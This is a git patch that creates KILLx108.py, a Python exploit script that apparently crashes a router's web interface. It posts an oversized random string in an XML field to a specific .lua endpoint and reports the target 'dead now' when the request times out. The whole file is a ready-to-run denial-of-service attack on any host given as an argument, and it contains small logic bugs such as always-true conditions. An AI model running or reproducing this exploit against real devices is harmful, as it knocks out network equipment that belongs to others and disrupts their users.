From 0e103dceb1d52c821d3746c722dc92b68971b656 Mon Sep 17 00:00:00 2001
From: Zer0verflow <62406753+Zeyad-Azima@users.noreply.github.com>
Date: Wed, 4 Jan 2023 16:07:13 +0800
Subject: [PATCH] Create KILLx108.py

---
 KILLx108.py | 56 +++++++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 56 insertions(+)
 create mode 100644 KILLx108.py

diff --git a/KILLx108.py b/KILLx108.py
new file mode 100644
index 0000000..2a3b4de
--- /dev/null
+++ b/KILLx108.py
@@ -0,0 +1,56 @@
+import random
+import string
+import sys
+import urllib3
+import requests
+
+
+urllib3.disable_warnings()
+
+
+def attack(target, porot):
+
+    url = f"{porot}://{target}/common_page/Localnet_WlanBasicAd_WLANSSIDConf_EncryOption_lua.lua"
+    try:
+        print("[+] Check if the target is alive")
+        check = requests.get(url, timeout=10, verify=False)
+        if check.status_code == 200 or 301 or 302 or 303:
+            print("[+] Target is alive")
+            print("[+] Sending your request...")
+            create = string.ascii_uppercase
+            payload = ''.join(random.choice(create) for i in range(100000))
+            cookies = {"_TESTCOOKIESUPPORT": "1"}
+            Headers = {"Connection": "close",
+                       "sec-ch-ua": "\"Google Chrome\";v=\"87\", \" Not;A Brand\";v=\"99\", \"Chromium\";v=\"87\"",
+                       "Accept": "application/xml, text/xml, */*; q=0.01", "X-Requested-With": "XMLHttpRequest",
+                       "sec-ch-ua-mobile": "?0",
+                       "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
+                       "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
+                       "Origin": "https://192.168.1.1", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "cors",
+                       "Sec-Fetch-Dest": "empty", "Referer": "https://"+target+"/", "Accept-Encoding": "gzip, deflate",
+                       "Accept-Language": "en-US,en;q=0.9"}
+            Data = f"<ajax_response_xml_root><INSTIDENTITY>{payload}</INSTIDENTITY></ajax_response_xml_root>"
+            try:
+                att = requests.post(url, headers=Headers, cookies=cookies, data=Data, verify=False, timeout=5)
+                print("[-] Target is not Vulnerable")
+                sys.exit()
+            except requests.exceptions.Timeout:
+                print("[+] Target vulnerable and dead now")
+
+            print("[+] Exploit by: Zeyad Azima")
+
+        else:
+            print("[-] Your Target is not Alive")
+    except Exception as error:
+        print("[-]", error)
+
+
+
+try:
+    if sys.argv[2] == "http" or "https":
+        attack(sys.argv[1], sys.argv[2])
+    else:
+        print("[-] Please enter a valid protocol (http or https)")
+
+except IndexError:
+    print("[-] Please Set your target \n ex: exploit.py target protocol")